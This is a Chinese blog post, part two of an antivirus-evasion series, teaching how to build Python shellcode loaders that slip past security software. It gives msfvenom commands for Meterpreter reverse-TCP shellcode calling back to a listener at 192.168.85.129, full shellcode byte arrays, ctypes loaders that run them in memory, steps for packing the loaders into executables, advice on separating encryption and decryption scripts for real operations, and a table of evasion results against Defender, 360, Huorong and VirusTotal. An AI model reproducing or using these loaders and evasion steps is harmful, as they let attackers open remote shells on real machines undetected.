免杀学习(二)python

最新推荐文章于 2024-05-01 10:19:06 发布

mushangqiujin

最新推荐文章于 2024-05-01 10:19:06 发布

阅读量591

点赞数

分类专栏：免杀文章标签：学习

本文链接：https://blog.csdn.net/m0_62207170/article/details/128589698

版权

免杀专栏收录该内容

3 篇文章 1 订阅

订阅专栏

0x00 shellcode加载器

使用python加载shellcode时一定要注意是32(x86)位还是64(x64)位的，否则会出现OSError: exception: access violation writing 0x00000000C6040000‘的错误,x64不兼容，只能在x64系统下运行，x86可以兼容，在x86和x64都能运行，推荐安装32位的python。

python 原始shellcode

使用msf生成shellcode时需要注意将换行替换掉，cs不用，cs生成的shellcode在同一行

msf生成shellcode，这里选择32位shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f c

msf生成base64加密的shellcode

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=192.168.85.129 lport=4444 -f c

msf配置监听器，并运行python,连接成功

msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 4444
set lhost 192.168.85.129
run

import ctypes
#msf
shellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x51\x48\x8b\x52\x18\x56\x48\x8b\x52\x20\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x49\x01\xd0\x50\x8b\x48\x18\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x4d\x31\xc9\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x48\x01\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x55\x81\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"
#64位加载器
# ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))
# handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
# ctypes.windll.kernel32.WaitForSingleObject(handle, -1)



#msf
shellcode=b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x31\xff\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x55\x81\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
#32位加载器方法一
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
#32位加载器方法二
shellcode=bytesarray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

加载shellcode参考文章

(34条消息) python加载shellcode免杀简介_whatday的博客-CSDN博客_ctypes.windll.kernel32.rtlmovememory(rwxpage, ctyphttps://blog.csdn.net/whatday/article/details/120588389 (34条消息) python加载shellcode免杀简介_whatday的博客-CSDN博客_ctypes.windll.kernel32.rtlmovememory(rwxpage, ctyphttps://blog.csdn.net/whatday/article/details/120588389

python 还可以进行base64,aes,反序列化

在进行aes先对其进行base64，然后在aes

0x01python打包器

使用pyisntaller，py2exe,nuitka进行打包成exe

pyinstaller使用时要找pyisntaller.exe 进入对应的文件夹的cmd执行

pip install pyinstaller #安装

pyinstaller -F 1.py #打包成exe

py2exe使用：

pip isntall py2exe

打包时需要在对应的文件夹新建setup.py

setup.py内容

from distutils.core import setup
import py2exe
INCLUDES = ['1'] #注意修改脚本项目名
 
options = {
    "py2exe":
        {
            "compressed": 1,  # 0或1,1压缩，0不压缩
            "optimize": 2,  # 0、1、2，文件的优化级别
            "bundle_files": 1,  # 1、2、3,1表示所有文件打包成一个exe文件，2表示除了Python的解释器外都绑定，3表示不绑定
            "includes": INCLUDES,  # 列表，包含其它的一些模块
            "dll_excludes": ['MSVCP90.dll']  # 列表，包含的dll文件不会打包进exe程序
        }
}
setup(
version='1.0.0',
options=options,
description="this is atest",
zipfile=None,  # 公用文件的压缩文件名称，默认为“library.zip”；如果没有，则会将这些文件放在最终的exe文件中
console=[{"script": '1.py'}]  # 生成一个控制台形式的exe程序，对应的有windows=[]，生成GUI形式的exe程序
)

python setup.py py2exe

nuitka使用：

pip install nuitka

nuitka是把python编译成c语言，所以需要安装c语言编译器mingw64

安装完还需要添加环境变量参考文章(34条消息) MinGW-w64 C/C++编译器下载和安装_石凌风SLF的博客-CSDN博客_mingw64https://blog.csdn.net/jiqiren_dasheng/article/details/103775488

使用下面的方法打包可以防止出现缺少python310.dll类似的错误

python -m nuitka --follow-imports 1.py --standalone --windows-disable-console --onefile

实战时是加密脚本和解密脚本分开来写，加密在本地，上传时是上传解密脚本，两个是分开来写的。

0x02 python aes免杀出现的错误

aes脚本进行打包出现了以下问题

Traceback (most recent call last):
  File "Crypto\Util\_raw_api.pyc", line 77, in <module>
ImportError: CFFI with optimize=2 fails due to pycparser bug.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "aesjie.py", line 1, in <module>
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 668, in _load_unlocked
  File "<frozen importlib._bootstrap>", line 638, in _load_backward_compatible
  File "zipextimporter.pyc", line 96, in load_module
  File "Crypto\Cipher\__init__.pyc", line 27, in <module>
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 668, in _load_unlocked
  File "<frozen importlib._bootstrap>", line 638, in _load_backward_compatible
  File "zipextimporter.pyc", line 96, in load_module
  File "Crypto\Cipher\_mode_ecb.pyc", line 29, in <module>
  File "<frozen importlib._bootstrap>", line 983, in _find_and_load
  File "<frozen importlib._bootstrap>", line 967, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 668, in _load_unlocked
  File "<frozen importlib._bootstrap>", line 638, in _load_backward_compatible
  File "zipextimporter.pyc", line 96, in load_module
  File "Crypto\Util\_raw_api.pyc", line 203, in <module>
  File "ctypes\__init__.pyc", line 377, in __getattr__
  File "ctypes\__init__.pyc", line 382, in __getitem__
AttributeError: function 'PyObject_GetBuffer' not found

解决方法:

安装disdribute模块

使用pip install 安装时又出错了，是因为distribute模块支持到py3.3

下面的命令可以解决这个问题

easy_isntall distribute

参考文章

(34条消息) ubuntu18.0+python3.6+安装distribute模块出错（可能已解决）_金色麦田~的博客-CSDN博客https://blog.csdn.net/weixin_43791511/article/details/103081677这是用pyisntaller和nuitka打包的aes可以正常使用，但py2exe还是出现上述错误，不知道该怎么解决

python的aes免杀脚本需要引入crypto和pycryptodome库，需要把lib的site-packeges的crypto改为大写的Crypto

from Crypto.Cipher import AES #进行aes需要引入的库

pip install crypto #安装crypyo

pip isntall pycryptodome #安装pycryptodome

参考文章

python3 安装Crypto.Cipher import AES - 简书 (jianshu.com)https://www.jianshu.com/p/06f861baee76py2exe还有一个问题就是如果用高版本的python，打包后生成的exe需要把对应的dll文件一起复制到其他主机才可以执行

解决方法：

换python版本，换成3.7.3

0x03免杀情况

vt是在在线查杀平台 VirusTotalVirusTotalhttps://www.virustotal.com/

利用方式	pyinstaller	py2exe	nuitka	杀软
原始c	√	√	√	火绒
	x	x	x	defender
	x	x	x	360
	26/71	18/71	24/71	vt
base64	√	√	√	火绒
	x	x	x	defender
	x	x	x	360
	19/59	14/70	19/70	vt
aes	√	打包失败	√	火绒
	x	打包失败	x	defender
	x	打包失败	x	360
	15/70	打包失败	8/71	vt
反序列化	√	√	√	火绒
	√	√	√	defender
	√	√	x	360
	13/71	8/71	17/69	vt